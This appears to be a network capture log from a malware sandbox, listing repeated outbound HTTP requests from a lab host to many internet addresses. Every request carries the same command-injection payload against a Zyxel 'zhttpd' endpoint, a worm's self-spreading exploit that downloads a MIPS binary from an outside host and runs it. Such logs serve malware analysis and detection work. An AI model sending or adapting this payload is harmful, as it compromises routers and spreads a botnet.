                                            Feb 2, 2024 06:21:15.682790995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5082192.168.2.1544854221.179.196.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682822943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5083192.168.2.155917899.89.47.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682873964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5084192.168.2.155450462.155.78.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682909966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5085192.168.2.1558024124.201.224.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682979107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5086192.168.2.1548770124.204.156.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682992935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5087192.168.2.1547148145.192.163.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683033943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5088192.168.2.1538818124.229.14.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683077097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5089192.168.2.153942049.149.0.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683083057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5090192.168.2.154547477.170.99.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683120012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5091192.168.2.1553088155.120.64.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683156967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5092192.168.2.1556272161.103.171.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683186054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5093192.168.2.154406682.24.225.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683235884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5094192.168.2.154096225.253.233.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683280945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5095192.168.2.154852094.114.117.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683326006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5096192.168.2.155229880.74.180.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683357000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5097192.168.2.1539152211.114.102.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683387041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5098192.168.2.155227842.22.71.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683437109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5099192.168.2.1544932140.80.251.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683458090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5100192.168.2.1560652157.176.2.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683486938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5101192.168.2.1546112191.112.101.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683547020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5102192.168.2.153305866.194.235.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683583021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5103192.168.2.153681288.161.197.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683620930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5104192.168.2.15378664.174.249.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683664083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5105192.168.2.1553192196.137.205.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683717966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5106192.168.2.1548732200.173.159.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683757067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5107192.168.2.1560598196.67.5.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683794022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5108192.168.2.153858242.94.23.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683823109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5109192.168.2.1533584103.140.68.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683856964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5110192.168.2.1533454218.25.96.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683895111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5111192.168.2.15440365.33.107.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683923006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5112192.168.2.1539586129.186.158.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.683974028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5113192.168.2.153296046.171.132.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684011936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5114192.168.2.1543592100.205.28.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684087992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5115192.168.2.1550970182.210.248.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684118986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5116192.168.2.1559202185.140.204.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684170008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5117192.168.2.15566188.75.210.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684214115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5118192.168.2.154574079.39.87.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684245110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5119192.168.2.155716082.53.150.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684302092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5120192.168.2.153554044.130.192.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684320927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5121192.168.2.155891688.135.188.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684360027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5122192.168.2.155930261.223.111.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684386015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5123192.168.2.1543956101.74.102.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684420109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5124192.168.2.1557662119.215.133.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684448957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5125192.168.2.1535934122.145.179.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684479952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5126192.168.2.1537758151.240.118.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684514046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5127192.168.2.1552014203.209.70.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684551001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5128192.168.2.1554036191.14.120.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684573889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5129192.168.2.1542208116.87.115.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684631109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5130192.168.2.1560764204.169.206.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684684038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5131192.168.2.1559188123.77.240.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684720993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5132192.168.2.1535386105.231.206.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684735060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5133192.168.2.156069627.62.91.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684806108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5134192.168.2.1544346219.13.252.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684845924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5135192.168.2.1539196189.28.252.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684887886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5136192.168.2.156078482.246.109.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684932947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5137192.168.2.154452897.75.70.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684972048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5138192.168.2.1535840172.45.188.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.684999943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5139192.168.2.1539144205.27.30.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685026884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5140192.168.2.1543216164.46.103.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685058117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5141192.168.2.153627891.61.165.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685082912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5142192.168.2.154188873.180.209.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685120106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5143192.168.2.1555360139.82.59.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685153008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5144192.168.2.1554190204.3.230.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685203075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5145192.168.2.154060273.112.7.218443
                                            TimestampBytes transferredDirectionData
